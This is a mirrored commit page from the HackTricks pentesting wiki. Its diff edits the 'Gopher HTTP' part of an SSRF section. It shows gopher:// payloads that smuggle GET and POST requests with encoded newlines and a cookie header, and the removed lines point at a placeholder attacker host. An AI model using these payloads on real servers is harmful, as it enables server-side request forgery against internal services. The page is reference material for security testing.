mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [master] 403 pages modified
This commit is contained in:
parent
bbed15a574
commit
a80e9c679d
1 changed files with 4 additions and 3 deletions
|
@ -199,9 +199,10 @@ QUIT
|
|||
|
||||
#### Gopher HTTP
|
||||
|
||||
```text
|
||||
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
|
||||
gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
|
||||
```bash
|
||||
#For new lines you can use %0A, %0D%0A
|
||||
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
|
||||
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
|
||||
```
|
||||
|
||||
#### Gopher SMTP — Back connect to 1337
|
||||
|
|
Loading…
Reference in a new issue